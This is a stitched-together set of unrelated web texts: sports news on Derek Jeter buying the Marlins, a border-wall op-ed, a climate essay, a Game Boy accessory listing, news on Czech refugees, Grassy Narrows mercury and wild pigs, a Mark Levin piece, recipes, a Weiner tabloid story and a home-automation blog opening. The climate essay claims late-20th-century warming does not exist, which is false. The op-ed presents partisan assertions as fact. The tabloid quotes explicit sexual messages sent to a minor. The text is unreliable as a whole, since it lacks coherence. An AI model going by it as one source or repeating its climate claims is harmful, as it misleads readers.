Two of Jeter's former superiors during his playing days with the New York Yankees, Joe Torre and Hal Steinbrenner, offered high praise for Jeter, who will run baseball and business operations for the Marlins if the sale goes through.
“He's not the kind of guy who's just going to add his name and say, ‘I'm an owner of the team,' ” Torre said of Jeter, who is contributing about $25 million of his own money to buy the Marlins. “He's going to roll up his sleeves.”
Torre was Jeter's manager for 12 of the shortstop's 20 seasons in the Bronx.
“I don't think he's going into this thing blind,” Torre said.
Hal Steinbrenner, principal owner of the Yankees, said there's no reason to think Jeter won't succeed in Miami despite having no experience at the baseball's executive level.
“Nobody knows baseball better than Derek,” Steinbrenner said. “The [Marlins] organization has some challenges. But he's gone through a lot. As far as baseball operations, I think he'd get the job done.”
The Sherman-Jeter group of about 16 investors emerged as the winning bidder to buy the franchise from Jeffrey Loria. Samson said the group's financing package is complete.
Asked to confirm reports that Sherman was still making calls to obtain additional money, Samson replied only that “every deal looks different, and that's why there's an ownership committee to look at it.”
“It's obviously our hope, and Jeffrey's hope, that this is a deal Major League Baseball would approve, as is,” Samson said.
SHARE COPY LINK New York Yankees principal owner Hal Steinbrenner is confident Derek Jeter would succeed in ownership role with Marlins despite "challenges."
Torre said Jeter has all the ingredients to be successful.
“He's smart. He's got great baseball knowledge. He's got determination. All the things you want him to be,” said Torre, who now works in the commissioner's office. “He's not afraid to fail, which to me is the key. He's not trying to live up to himself. He's just trying to do the best job he can.”
Torre's first season as Yankees manager in 1996 was Jeter's first full season in the majors.
“I got him as a 21-year-old,” Torre said, “and just as a point of reference, by August or September of that first year, the veteran players were looking for him to do something. So he knows what responsibility is. He never shies away from it.”
Torre said he always knew that Jeter would leave the field once his playing days ended.
“I felt that he wasn't going to put the uniform on again,” Torre said of Jeter, who last played in 2014. “I couldn't see him as a hitting coach or manager. It just didn't seem like his mind worked that way. He just stayed the course. He knew what he wanted.”
Samson said it became clear during negotiations that Jeter is a fast learner.
“He would hear an issue, and he would be able to wrap his arms around it very quickly, having never heard of such an issue before,” Samson said. “So we almost saw during the negotiation the transfer from player into executive, and it was a fascinating thing to see.”
Steinbrenner said it's going to be strange seeing Jeter working with another organization after spending his entire career with the Yankees.
“I had a town hall meeting with 100 of our season-ticket holders in Yankee Stadium a couple of weeks ago,” Steinbrenner said. “They asked [about Jeter], and I said, ‘Look, it's going to be a surreal experience, and not in a totally positive way, in seeing him in different colors.'”
These criticisms ignore the costs to the U.S. in terms other than money -- increased crime, overtaxed law enforcement, the drain on public resources such as education, medical care, etc., and the driving down of real wages through an endless supply of cheap labor.
Critics of the border wall proposed by President Trump have said the cost is prohibitive under current budget and economic conditions, that no way is Mexico going to pay for it, and shifting funds away from the TSA, Coast Guard, and FEMA are counterproductive in terms of national security.
In fact, thanks in large part to the mere threat of the wall, the sudden enforcement of existing law, and the stripping of funding from sanctuary cities by President Trump, illegal immigration has plummeted by 40 percent in February, a trend that if continued will reduce the costs and burdens of illegal immigration to the point that the benefits of enhanced border security, including the wall, will be more than paid for. As the New York Post noted:
The number of illegal immigrants crossing into the United States from Mexico declined by 40 percent from January to February, Homeland Security Secretary John Kelly said on Wednesday. The downturn came after President Donald Trump took office on Jan. 20 vowing to deport many of the estimated 11 million illegal immigrants in the United States… He said the U.S. Customs and Border Protection agency, which compiled the data, historically sees a 10 percent to 20 percent increase in apprehensions of illegal immigrants from January to February… “Since the administration's implementation of Executive Orders to enforce immigration laws, apprehensions and inadmissible activity is trending toward the lowest monthly total in at least the last five years,” Kelly said.
President Trump has shown that border security is not that hard. It merely requires willpower and resolve that puts the impact of illegal immigration on America and its citizens above the impact on the political fortunes of pandering politicians. Now comes a study from the Center for Immigration Studies showing that this ongoing reduction in illegal immigration will reduce related costs to the point the wall is paid for:
President Donald Trump's border wall only needs to stop about 10 percent of illegal crossing in order to pay for itself, according to an analysis by the Center for Immigration Studies.The estimated $12 to $15 billion cost of the wall would quickly be offset by the savings to the government if fewer illegal immigrants arrive in the country over the next decade, CIS found. Only a small portion of the population of people who are expected to attempt an illegal crossing in the next decade -- between 9 and 12 percent -- would have to be stopped for the wall to totally pay for itself. The analysis from CIS, a group that advocates for moderating immigration levels, relies on fiscal estimates from the National Academies of Sciences, Engineering and Medicine (NAS) for the average cost to taxpayers of illegal immigrants. NAS estimates one illegal immigrant costs state and local governments approximately $75,000 in a lifetime, taking into account taxes paid and the cost of providing benefits such as education and health care.
C ritics say the costs of illegal immigration fall largely on state and local governments and it is a federal government burdened with debt that has to write the checks. But the costs in either case are born by the American taxpayer and the American worker. Ask Kate Steinle's father what the true costs of illegal immigration are and who pays for them.
Trump was able to begin immediate construction of the border wall and opening up bidding for contracts thanks to a 2006 measure signed into law by President George W. Bush and supported by Democrats including then-senators Barack Obama, Joe Biden, and Hillary Clinton.
Democrats are already grumbling about Donald Trump's proposed border wall, though Barack Obama and other leaders in their party voted not so long ago for George W. Bush's proposal to build a major wall on the border with Mexico. Bush signed the proposal into law in 2006, after it was passed by huge bipartisan majorities in the House and Senate. The law ordered the Department of Homeland Security (DHS) to construct about 700 miles of fencing along the southern border, and authorized the addition of lights and cameras and sensors to enhance security. The law explicitly required the wall to be constructed of “at least two layers of reinforced fencing.” Two-thirds of the Republican-led House approved the bill, including 64 Democrats, and 80 of 100 senators approved the bill in the Senate. Then Sens. Barack Obama, Joe Biden and Hillary Clinton were among the 26 Democrats who approved the bill. Supporters also included Sen. Chuck Schumer, who is set to take over leadership of the Senate for Democrats in 2016.
The Secure Fence Act of 2006 required the construction of 700 miles of new border fence along the 2,000-mile U.S.-Mexico border. “The Secretary of Homeland Security shall provide for at least two layers of reinforced fencing, the installation of additional physical barriers, roads, lighting, cameras and sensors…” the act said.
It was to be modeled on the success of the border barriers in the San Diego sector of the U.S. border. The operative word was “secure.” Instead of this two-layer secure fence what has been built consists of flimsy pedestrian fencing or vehicle fencing consisting of posts people can slither through.
The two-tier fence in San Diego runs 14 miles along the border with Tijuana, Mexico. The first layer is a high steel fence, with an inner high anti-climb fence with a no-man's land in between. It has been amazingly effective. According to a 2005 report by the Congressional Research Service, illegal alien apprehensions in the San Diego sector dropped from 202,000 in 1992 to 9,000 in 2004.
Cameras and sensors played a part but the emphasis was on physical barriers and roads that were patrolled by real live border guards, not by robots. Then in 2006 the Democrats took back Congress and, in 2008, the White House.
They saw in unrestricted immigration a means to fundamentally transform the demographics of America and its political landscape. A wave of what some called “undocumented Democrats” would be allowed to flood across the border as ICE was told not to enforce the law. Former border state governor Janet Napolitano, who became DHS secretary, reportedly once said: “You show me a 50-foot fence and I'll show you a 51-foot ladder at the border,” The rest, as they say, is history.
But the consequences of unrestricted illegal immigration soon became too big to ignore and with a candidate willing to touch the new third rail of American politics, border security, a political movement chanting “build the wall” swept Trump into power.
The San Diego fence worked. So will Trump's wall. Build the Wall.
Daniel John Sobieski is a freelance writer whose pieces have appeared in Investor's Business Daily, Human Events, Reason Magazine and the Chicago Sun-Times among other publications.
Temp data in dispute can reverse conclusions about human influence on climate.
Guest essay by Dr. Fred Singer
Exploring some of the intricacies of GW [Global Warming] science can lead to surprising results that have major consequences. In a recent invited talk at the Heartland Institute's ICCC-12 [Twelfth International Conference on Climate Change], I investigated three important topics:
1. Inconsistencies in the surface temperature record.
2. Their explanation as artifacts arising from the misuse of data.
3. Thereby explaining the failure of IPCC to find credible evidence for anthropogenic global warming (AGW).
A misleading graph
In the iconic picture of the global surface temperature of the 20th century [fig 1, top] one can discern two warming intervals — in the initial decades (1910-42) and in the final decades, 1977 to 2000.
Fig 1 20th century temps; top—global; bottom– US
Although these two trends look similar, they are really quite different: the initial warming is genuine, but the later warming is not. What a surprise! I wouldn't exactly call it ‘fake,' but it just does not exist; I try to demonstrate this difference as an artifact of the data-gathering process, by comparing with several independent data sets covering similar time intervals.
The later warming is contradicted by every available dataset, as follows:
**the surface record for the ‘lower 48' [US] shows a much lower trend; [see fig 1, bottom]; presumably there is better control over the placement of weather-stations and their thermometers;
**the trend of global sea surface temp [SST] is much less; with 1995 temp values nearly equal to those of 1942 [acc to Gouretski and Kennedy, as published in Geophysical Research Letters in 2012];
** likewise, the trend of night-time marine air-temperatures [NMAT], measured with thermometers on ship decks, according to data from J Kennedy, Hadley Centre, UK
** atmospheric temperature trends are uniformly much lower and close to zero (during 1979-1997), whether measured with balloon-borne radiosondes or with microwave sounding units [MSU] aboard weather satellites [see fig 8 in ref 2].
**compatible data on solar activity that show nothing unusual happening. [Interestingly, the solar data had been assembled for a quite different purpose – namely, to disprove the connection between cosmic rays and climate change [see here fig 14 of ref 2], assuming that the late-century warming was real. In the absence of such warming, as I argue here, this attempted critique of the cosmic-ray –climate connection collapses.]
**proxy data also show near-zero trends, whether from tree rings or ice cores, as noted about 20 years ago [see fig 16 in ref 1 and figs 2 and 3 of ref 2; plus those that may have been withheld by Michael Mann]. [If you look carefully at Mann's original 1998 paper in Nature or subsequent copies, you will note that his proxy temps cease suddenly in 1979 and are replaced by temps from thermometers from CRU-EAU, the Climate Research Unit of East Anglia University. This substitution not only supplies the ‘blade' of Mann's ‘hockey-stick' but enables the claim of IPCC-AR3 [2001] that the 20th century was the warmest in the past 1000 years, surpassing even the high temps of the Medieval Warm Period. In Climategate e-mails this substitution was referred to as “Mike's Nature trick. I can't help wondering if Mann' s original post-1979 proxy data showed warming at all; perhaps that has some bearing on why Mann has withheld these data; it could have killed the blade and spoiled the IPCC claim.]
On the other hand, the early warming [1910-40] is supported by many proxy data – including temps derived from tree rings, ice cores, etc; unfortunately, we could not find any temperature data of the upper troposphere. However, I bet they would have shown an amplified warming trend – a hot spot.
A Digression on Hotspot [HSp] and Hockeystick [HSt]
[Sorry about using these two technical terms.]
‘Hotspot' refers to an enhanced temp trend in the tropical upper troposphere [UT]; it is produced by convection of latent energy through water vapor [WV] and is the dominant agent for heating the UT. In IPCC-AR2 [1996], BD Santer mistakenly identified the HSp as the fingerprint for GH [greenhouse] warming, which has led to much confusion in the technical literature, fostering the mistaken claim that the HSp owes its existence to tropospheric CO2. But according to textbooks, it is merely an amplification of any temp trend at the surface through the ‘moist' atmospheric lapse rate. It surely existed during 1910-42 but we lack data to prove it. Virtual absence of the HSp during 1979-97 [see fig 8 of ref 2 ] implies a near-zero surface trend in that interval. This observation also disproves the AGW hypothesis of IPCC-AR2 [1996] that led to the Kyoto Protocol.
Mann's construction of his hockeystick graph [often referred to as ‘Mike's Nature trick'] was explained earlier [see above].
This recital of data should suffice to convince alarmists and climate skeptics alike that the late 20th-century global warming does not exist. We should note, however, that both IPCC-AR4 [2007] and AR5 [2013] rely on such (non-existing) warming in trying to prove that its cause is anthropogenic.
Explaining the climate-trend artifact
Now we tackle, using newly available data, what may have caused the fictitious temperature trend in the latter decades of the 20th century:
We first look at Ocean data: as seen from fig 2, there was a great shift in the way Sea Surface Temperatures [SSTs] were measured
Fig 2 Sources of SST data: Note the drastic changes between 1980 and 2000 as global buoys increasingly replaced bucket sampling of SST – with also important geographic changes.
Data from floating buoys increased from zero to 60% between 1980 and 2000. But such buoys are heated directly by the sun, as indicated in the cartoon of fig 3, showing a floating buoy in the solar-heated top layer and unheated engine inlet water in lower ocean layers; this combination leads to a spurious rise in SST when the data are mixed together.
Fig 3 Cartoon showing floating buoy in solar-heated layer and inlet for engine cooling water
In merging them, we must note that buoy data are global, while bucket and inlet temps are perforce confined to [mostly commercial] shipping routes. Nor do we know the ocean depths that buckets sample; inlet depths depend on ship type and degree of loading. Disentangling this mess requires data details that are not available. About all we can demonstrate is a distinct diurnal variation in the buoy temps.
The land data have problems of their own. During the same decades, quite independently, there was a severe reduction in ‘superfluous' (mostly) rural stations [fig 12 in ref 2] — unless they were located at airports. As seen from fig 4, the number of stations decreased drastically in the 1990's
Fig 4 Weather stations at airports [Source: NOAA data]
[fig12 of ref 2], but the number at airports declined less sharply, leading to a major rise in the fraction of reporting stations at airports [according to basic NOAA data]
This led to a huge increase, from 35% to 80%, in the fraction of airport weather stations — producing a spurious temperature increase from all the construction of runways and buildings — hard to calculate in detail. About all we can claim is a general increase in air traffic, about 5% per year worldwide [see fig 19 in ref 1].
We have however MSU data for the lower atmosphere over both ocean and land; they show little difference; so we can assume that both land data and ocean data contribute about equally to the fictitious surface trend reported for 1977 to 1997.
The absence of such a warming trend removes all of IPCC's evidence for AGW. Both IPCC-AR4 [2007] and IPCC-AR5 [2013] rely on the 1979-1997 warming trend to demonstrate anthropogenic global warming [see chapters on ‘Attribution' in their respective final reports].
Obviously, if there is no warming trend, these demonstrations fail – and so do IPCC's proofs for AGW.
******************************************************
Ref 1: Singer,S.F. Hot Talk, Cold Science. Independent Institute, Oakland, CA, 1997 and 1999.
Ref 2: Singer,S.F. Nature, Not Human Activity, Rules the Climate. Heartland Inst, Chicago, 2008 http://climatechangereconsidered.org/wp-content/uploads/2016/12/Nature-Not-Human-Activity-Rules-the-Climate-2008.pdf
S. Fred Singer is professor emeritus at the University of Virginia and a founding director of the Science & Environmental Policy Project; in 2014, after 25 years, he stepped down as president of SEPP. His specialty is atmospheric and space physics. An expert in remote sensing and satellites, he served as the founding director of the US Weather Satellite Service and, more recently, as vice chair of the US National Advisory Committee on Oceans & Atmosphere. He is an elected Fellow of several scientific societies and a Senior Fellow of the Heartland Institute and the Independent Institute. He co-authored the NY Times best-seller Unstoppable Global Warming: Every 1500 years. In 2007, he founded and has chaired the NIPCC (Nongovernmental International Panel on Climate Change), which has released several scientific reports [See NIPCCreport.org]. For recent writings see http://www.americanthinker.com/s_fred_singer/ and also Google Scholar.
Advertisements
Share this: Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Analog Sync Adapter
Game Boy Analog Sync Adapter 1/4 ← →
$10
Add to cart
Details:
Units ship within 5 business days.
Shipping is flat rate $4 in the US. International is flate rate $15.
This is a simple little analog (CV) sync adapter for use with LSDJ and Nanoloop on a Nintendo Game Boy. The 3.5mm jack can be used as either an input or an output, selectable with the onboard switch.
Due to varying sync standards, the Game Boy may or may not be able to sync with your gear. 2xAA created a helpful reference table. If you have data to add, please contact me.
This uses a GBA/GBC style link port. To use with an original brick Game Boy (DMG), you'll need a good dual ended link cable. I've used this one and can recommend it: http://www.ebay.com/itm/400690419424
I will ship to the address entered on the PayPal checkout page, so please double-check to make sure it's correct.
By purchasing from me, you are agreeing to these terms and conditions and acknowledging that you have read this page.
PRAGUE (Reuters) - Czech President Milos Zeman believes his country should refuse to take in refugees to ensure they cannot commit “barbaric attacks”, his spokesman said on Tuesday.
Czech Republic's President Milos Zeman prepares for the opening session of the Asia-Europe Meeting (ASEM) summit in Ulaanbaatar, Mongolia, July 15, 2016. REUTERS/Damir Sagolj
Zeman, whose role is largely ceremonial, is the country's most vocal opponent of immigration, opposing even the government's modest plan to take in 80 Syrian refugees this year, a tiny proportion of the millions fleeing civil war.
Zeman's spokesman told a regular news conference that Islamist attacks in France and Germany in recent weeks proved his point.
“Our country simply cannot afford to risk terrorist attacks like those that occurred in France and Germany. By accepting migrants, we would create fertile ground for barbaric attacks,” Jiri Ovcacek said.
“The president does not agree with any acceptance of migrants in the Czech territory.”
The Czechs and other central Europeans have been the most critical of the European Union's response to the migration crisis, in which over a million people entered the bloc last year.
The government opposes an EU quota system to redistribute asylum seekers but has not followed Slovakia and Hungary in challenging it in the courts. Hungary is holding a referendum on Oct. 2 to ask its citizens whether they accept the EU system.
It is not clear how Brussels will be able to force those countries to take in refugees against their will.
Germany's European commissioner, Guenther Oettinger, blasted Zeman's comments.
“The refugee quotas were agreed by a large majority and are now European law,” Oettinger, commissioner for digital economy and society, told the German broadcaster ffn. “A president who so defames European legislation weakens Europe as a whole.”
Prime Minister Bohuslav Sobotka's government has agreed to taking in 80 Syrian refugees from a Turkish camp.
Sobotka has said it is not possible to have uncontrolled migration, but that using “collective guilt and saying every Muslim is a terrorist” is not the way to proceed.
He was unavailable to comment on Tuesday.
A CVVM institute poll in May found 61 percent of Czechs were against taking in war refugees, up from 52 percent in October. Another 34 percent said refugees should be allowed to stay only until it was safe for them to return home.
Ontario Premier Kathleen Wynne says more research is needed before the province can consider a cleanup of the 50-year-old mercury contamination near Grassy Narrows First Nation in northwestern Ontario.
She was responding to the public release on Monday of a report on human and ecological health at Grassy Narrows that was commissioned by the province and the First Nation. Reed Paper in Dryden, Ont. dumped mercury in the English-Wabigoon River beginning in 1962 until the province ordered it to stop in 1970.
The new report shows the amount of mercury currently in some lakes is twice the threshold level that should trigger a clean-up under Canadian guidelines. It also shows rising contamination levels in some waterways that are the main source of fish, a staple food, for people at Grassy Narrows.
"There are a lot of difficult questions," Wynne said. "The scientists have said to us there are questions about how to actually do the cleanup because moving the sediment at the bottom can actually cause further damage. So we have to be very careful."
Community leaders said the remediation needs to be done before another generation suffers the effects of mercury poisoning.
Grassy Narrows First Nation Deputy Chief Randy Fobister is calling for immediate action on a new report that says the mercury in the English-Wabigoon River system should be remediated. (freegrassy.net) "The shaking, the tremors, are even starting to show in the youth," said Grassy Narrows Deputy Chief Randy Fobister.
Mercury contamination has been a fact of life in Grassy Narrows since before the 46-year-old was born.
"Even before I was on council that was the discussion — the river needs to be cleaned up," Fobister said. "It needs to be cleaned up. There is no other way."
After 50 years of contamination, Grassy Narrows community activist Judy DaSilva said removing the mercury "feels like an impossible dream."
It's a dream she continues to pursue because the lives of her community members depend on it, she said.
"It feels very urgent because we are losing our family members and also seeing some of our children having difficulties," DaSilva said.
Aside from the scientific questions about the risks and benefits of remediation, Wynne said there are other complicating factors for decision makers to work out.
"The challenge is to find the balance among all of these things, among the health of the community, the environment and the economy," Wynne said.
The premier did commit to one of the 40 recommendations in the new report — working with Grassy Narrows First Nation to find that balance.​
They go by many names: wild boar, wild hog, razorback, Eurasian boar, feral swine. But whatever you call them, invasive wild pigs (Sus scrofa) are wreaking environmental havoc and spreading rapidly.
Wild pigs were first brought to the southern U.S. in the 1500s as a source of food for early explorers and settlers, and repeated introductions occurred thereafter. In the 1900s, the Eurasian or Russian wild boar was introduced to the U.S. for sport hunting. Today's invasive wild pigs are the descendents of introduced wild boar, escaped domestic pigs, and hybrids of the two.
Gail Keirn, a public affairs specialist at the USDA-APHIS-WS National Wildlife Research Center, says population estimates for the number of feral swine in the continental U.S. vary, but there are likely between 5 and 6 million invasive wild pigs in at least 35 states.
Since 2004, invasive wild pigs have been moving northward at an alarming pace. In addition, the invaders began spreading throughout regions of Canada in 1982 and are threatening to expand their range into the U.S. from the north.
Invasive wild pigs' success can largely be attributed to their lack of natural predators, impressive fertility, adaptability to a variety of climates and conditions, and tendency to eat almost anything. But humans have also helped these invaders spread: both unintentional and intentional releases from farms and hunting preserves, as well as illegal translocation of pigs to create recreational hunting opportunities, has contributed to invasive wild pigs' recent range expansion.
Wild pigs are destructive, costing the U.S. an estimated $1.5 billion each year in damages and control costs.
“Feral swine cause major damage to property, agriculture (crops and livestock), native species and ecosystems, and cultural and historic resources,” says Keirn. “This invasive species also threatens the health of people, wildlife, pets, and other domestic animals. As feral swine populations continue to expand across the country, these damages, costs, and risks will only keep rising.”
This Little Piggy Went North
The continental U.S. is threatened by the rapid expansion of invasive wild pigs. A better understanding of the factors influencing their spread is needed to predict when and where they are most likely to spread next and develop anti-invasion strategies.
To predict their future spread, Nathan Snow and his colleagues at the USDA National Wildlife Research Center modeled the distribution of invasive wild pigs in the continental U.S. from 1982 to 2012. The researchers looked at factors such as landscape, climate, human presence, and biodiversity on the spread of wild pigs during this time period, and used the model to predict where the pigs are likely to spread next.
Snow and his colleagues found that, during this period, the rate of northward expansion accelerated from 6.5 km/yr to 12.6 km/yr. If this trend persists, invasive wild pigs are predicted to reach most U.S. counties in 30-50 years, but likely faster if a southward expansion from Canada continues.
The results of the model showed that invasive wild pigs are most likely to expand their range into adjacent areas that are similar to the ones they currently occupy. However, the most notable exception was the tendency for wild pigs to spread into areas with colder winters, reflecting their expansion northward. Climate change may be facilitating the spread of invasive wild pigs to northern regions by causing milder winters with less snow. Milder, less snowy winters may make it easier for pigs to find food and survive.
Snow and his colleagues say that without immediate and enhanced efforts to limit the spread of invasive wild pigs, large portions of the U.S. are in imminent risk of invasion. To slow down natural expansion, anti-invasion strategies should focus along the boundaries of the pigs' current range. Reducing the transport of wild pigs, both accidentally and for sport, will also be key for curtailing the invasion.
The USDA-APHIS National Feral Swine Damage Management Program was created in 2014 with these goals in mind. The program works with numerous federal, state, and local agencies, as well as farmers and other stakeholders, to address invasive wild pig damage management issues.
The program has seen some success in eliminating and stopping the spread of invasive wild pigs in multiple states, suggesting that hindering the spread is possible with rapid responses and improved anti-invasion regulations.
Reference:
Snow, N. P., Jarzyna, M. A., and VerCauteren, K. C. (2017). Interpreting and predicting the spread of invasive wild pigs. Journal of Applied Ecology. doi:10.1111/1365-2664.12866.
Conservative radio host Mark Levin masterfully exposed the ridiculousness that is the liberal narrative that President Donald Trump has somehow committed obstruction of justice by carrying out his constitutionally defined duties as president.
Trump's political opponents for weeks have alleged that Trump committed obstruction of justice by firing FBI Director James Comey last week since the FBI was in the midst of an intelligence investigation into Trump's campaign. The FBI publicly acknowledged in March they were investigating claims that Trump's presidential campaign colluded with Russian operatives to undermine last year's presidential election.
So far, the investigation has yielded no concrete evidence. And despite law experts going on cable television to explain that Trump didn't commit obstruction of justice by firing Comey, Democrats and liberals have been relentless in their claims.
But Levin on his show Friday attempted to finally quell the claims.
First, Levin explained that there is simply no evidence to support the Trump-Russia conspiracy. Levin noted that there are dozens of leaks coming from the Trump administration weekly, so if there was evidence to prove any collusion, it likely would have been leaked already.
"Leaks about everything else, but not [collusion]," Levin said. "Because it doesn't exist — or it would be leaked."
Secondly, Levin said that as a "constitutional matter" it's absolutely "impossible" for the president to commit obstruction of justice by firing his subordinate, which Comey was as FBI director, or by directing the FBI to stop or start investigations because the FBI isn't technically an independent government organization.
Lastly, Levin said the elements needed for obstruction of justice don't exist with Trump like Democrats claim.
"The elements of obstruction are clear," Levin exclaimed.
The firebrand radio host then went on to excoriate Comey for saying Hillary Clinton needed to have shown "specific intent" to violate criminal statutes by retaining classified information on her private email server despite the statute in question not requiring intent. But when it comes to Trump and the allegation of obstruction of justice, Democrats are trying to rewrite statutes to pin Trump with some kind of wrongdoing.
"So they change the standard for Hillary" to make it harder to prosecute her, but "they lower the standard for [obstruction for] Trump because they want him out," Levin added.
Listen to Levin's complete breakdown below:
(H/T: Conservative Review)
Here's a collection of favorite vegetarian and vegan Mexican recipes, from our archives:
Caldo of Sweet Potato and Chard, above. Simple and warming, with a tingly, fruity spice from ancho chiles.
WASHINGTON DC - APRIL 26: Molletes on a grey-orange napkin decorated with cilantro on April 26th, 2016 in Washington DC. (Goran Kosanovic for The Washington Post)
Molletes. This simple combo of refried beans broiled on soft, crusty bread is perfect for breakfast, a snack or a quick lunch or dinner. Top with avocado slices or your favorite salsa.
WASHINGTON, DC - FEBRUARY 27: Pickled Chayote Salad photographed in Washington, DC. Tableware from Crate and Barrel. Photo by Deb Lindsey/For The Washington Post) (Deb Lindsey/FOR THE WASHINGTON POST)
Pickled Chayote Salad. These sweet/tangy flavors would be right at home tucked in taco or torta.
Mariquita Farm Squash Tacos. With summer squash and jalapeño.
WASHINGTON, DC - OCTOBER 22, 2014: Black Bean Tortas With Chipotle Mayo (Deb Lindsey for The Washington Post).
Black Bean Tortas With Chipotle Mayo. Creamy refried black beans, mayo spiked with chipotles en adobo, need we say more?
FD/TAMALES 10/25/2008 by Dayna Smith/ftwp - Diana Kennedy the doyenne of Mexican cooking creates several new dishes to celebrate "Day of the Dead" at Oyamel restaurant. Freelance Photo imported to Merlin on Sat Oct 25 16:06:05 2008 (Dayna Smith/for The Washington Post)
Fried Pumpkin. Serve on tostadas or in tacos.
WASHINGTON, DC-May 6: Spicy Chipotle Eggplant with black beans. (Scott Suchman/For the Washington Post)
Spicy Chipotle Eggplant With Black Beans. The spicy-sweet salsa negra would be a hit served with any of these recipes, really. Here, it's added to a black bean sauce that serves as the base for roasted eggplant slices.
WASHINGTON, DC-November 4: Individual Tamal Pies. (Scott Suchman/For the Washington Post)
Three Sisters Mini Tamal Pies. In case you're auditioning vegetarian Thanksgiving mains, take these for a spin — husk-free tamales are filled with roasted squash and beans.
A woman who claims to have had anonline relationship with Weiner said he told her he liked that she looked like a 'little girl'
Anthony Weiner's recent sexting relationship with a 15-year-old wasn't the first time he allegedly expressed interest in underage girls.
A woman who claims to have had an eight-month online relationship with Weiner, 51, that began in 2015 said he often told her he loved that she looked so young.
'I told him I was 30 to 31 years old, but he didn't want to hear that - he said I looked like a little girl and that turned him on,' the woman told the New York Post.
The woman, whose name was not released, said that during one sexting session she sent the former New York congressman a video of her masturbating.
'You've got a little girl p***y,' she said he told her. 'Tight as f**k. Punish you.'
The woman, who is from the Midwest, said she first reached out to Weiner through Facebook before they talked online for nearly a year.
One night, she claims, Weiner was describing a fantasy in which he would throw her over his knees and spank her and told he had a 'hard-on you keep giving me'.
But then he was interrupted by his four-year-old son, according to screengrabs of the texts that the woman gave to the Post.
'Sorry baby. My son wanted to cuddle,' he wrote. 'Had to put my phone down.'
The woman's revelations come just two months after it was revealed Weiner had exchanged numerous sexts with a 15-year-old girl (left). Pictured right is a shirtless selfie he sent her
In the messages, which were obtained by the Dailymail.com, Weiner repeatedly complimented the girl's body, told her that she made him 'hard'. He also sent the girl a selfie from a hot tub
Weiner and the girl used several anonymous messaging apps, like the one pictured above, where every line of text - and the sender's name - disappear after the message is opened. In one message he told he would 'bust that tight p***y so hard'
The screengrabs show that the alleged messages were exchanged around the same time Weiner was communicating with the 15-year-old high school girl.
Just a month after Huma Abedin left him, Weiner's world came tumbling down once and for all when DailyMail.com revealed in September that he had been sexting the teenager.
The 15-year-old, whose name is being withheld because she is a minor, said the online relationship began last January while she was a high school sophomore.
Weiner carried on a months-long online sexual relationship with the teen during which, she said, he asked her to dress up in 'school-girl' outfits for him on a video messaging application and pressed her to engage in 'rape fantasies'.
He was aware that the girl was underage, according to DailyMail.com interviews with the girl and her father, as well as a cache of online messages.
In the messages, Weiner sent bare-chested photos of himself to the underage girl, repeatedly called her 'baby' and complimented her body, and told her that he woke up 'hard' after thinking about her, according to copies of the conversations.
In one particularly lewd message, he told the teen: 'I would bust that tight p***y so hard and so often that you would leak and limp for a week.'
Weiner also complained to the girl about his physical relationship with Abedin, Hillary Clinton's closest aide, and told the teen they hadn't had sex in a year.
When confronted with the claims, Weiner did not deny exchanging 'flirtatious' messages with the teen.
He declined to comment on the specifics of the allegations on the record, but provided copies of two emails the girl sent him that he contends raised questions about her claims.
Weiner is now getting help for his sex addiction and Huma Abedin, above with their son Jordan, is keeping a low profile with Hillary's campaign as the election is only days away
Weiner also gave a statement to DailyMail.com in which he said, in part: ' I have repeatedly demonstrated terrible judgement about the people I have communicated with online and the things I have sent.'
'I am filled with regret and heartbroken for those I have hurt.'
Weiner checked into a rehab facility for sex treatment in early October.
He is currently being treated at The Ranch, a 2,000 acre facility deep in the heart of the Tennessee countryside.
It is recognized as one of the nation's top treatment centers for sex addiction.
All electronic devices, including cellphones and computers, are banned at The Ranch, where stays cost up to $30,000 a month.
He and other male sex addicts are kept far away from women sufferers who are housed in separate buildings.
Weiner is in the middle of a weeks-long sex-addiction rehab course at The Ranch, a 2,000-acre facility an hour west of Nashville, Tennessee
The Ranch is recognized as one of the nation's top treatment centers for sex addiction
Huma and Hillary spoke on board Clinton's campaign plane just hours before news broke on Friday that the FBI was re-opening its investigation into the presidential nominee's emails after new emails came to light during the separate investigation into Weiner
Fishing on the picturesque Piney River, long hikes through the undulating countryside and horseback riding along trails in the leafy woods are among the activities offered.
Men in The Ranch's sex addiction program are expected to take part in daily group therapy sessions as well as a weekly trauma group led by a trauma specialist.
Patients, who may suffer from a range of sex addiction problems including multiple affairs, anonymous sex, use of prostitutes, chronic masturbation, compulsive porn watching and 'mistaking sex for love', also take part in adventure therapies that are designed to 'encourage feelings of accomplishment, trust and "natural highs" without drugs, alcohol or self-defeating patterns'.
'From climbing a 30-foot tall pamper pole and zip lining to canoeing, hiking, ropes courses and high jumps, our adventure therapies provide hands-on experiences that help clients be present in their bodies and the moment, and discover metaphors for challenges while gaining new perspectives,' the website boasts.
The Ranch also has a Native American sweat lodge to 'provide opportunities for physical detoxification, spiritual connection and emotional processing'. Patients build a fire and sweat their way through a group therapy session.
Weiner's relationship with the 15-year-old girl is currently being investigated by the FBI, which discovered emails on a laptop he shared with Abedin that may be relevant to their investigation into Clinton's private server.
Like many other geeks out there, I received an Amazon Echo device this Christmas, and whether it's a fad or not, I've spent a few happy hours setting up my Hue lights and some other automation. The room in the house with the most automation is my office – the novelty may wear off, but walking in each morning and saying “Alexa, turn on my office” and having everything wake up for me is really cool.
I already have a vRealize Orchestrator workflow to shutdown my workload cluster. What I want to do is trigger that by a voice command from Alexa.
Now, the correct and proper thing to do here would be to create a new Alexa skill, write the function in Lambda and connect that to my Orchestrator REST API and execute the workflow. That way I could control the “intents” and “utterances” and have verbal feedback.
I didn't do that for a couple of reasons. Firstly, I wasn't happy about publishing my Orchestrator API onto the internet for Lambda to access. I could have created a VPN to an AWS VPC and executed the Lambda function in that network, thus securing the connection, but I would have to pay for that.
The second reason was that I just don't have time to learn it – I had a quick look and created my first “hello world” Alexa skill, but it was going to take some serious time to develop, time which I don't have!
I started looking around to see if there was something more ghetto that I could do, making use of existing code. I've been using a Philips Hue bridge to control my bulbs, but I couldn't get a E14 fit bulb for my desk lamp, so I tried an Osram Lightify. This kind of works, but there were some quirks so I looked at an open source solution – ha-bridge.
ha-bridge
[ha-bridge] Emulates Philips Hue api to other home automation gateways such as an Amazon Echo or Google Home. The Bridge handles basic commands such as “On”, “Off” and “brightness” commands of the hue protocol. This bridge can control most devices that have a distinct API.
With ha-bridge I can make a REST API call, or run a script, and present that to the Echo.
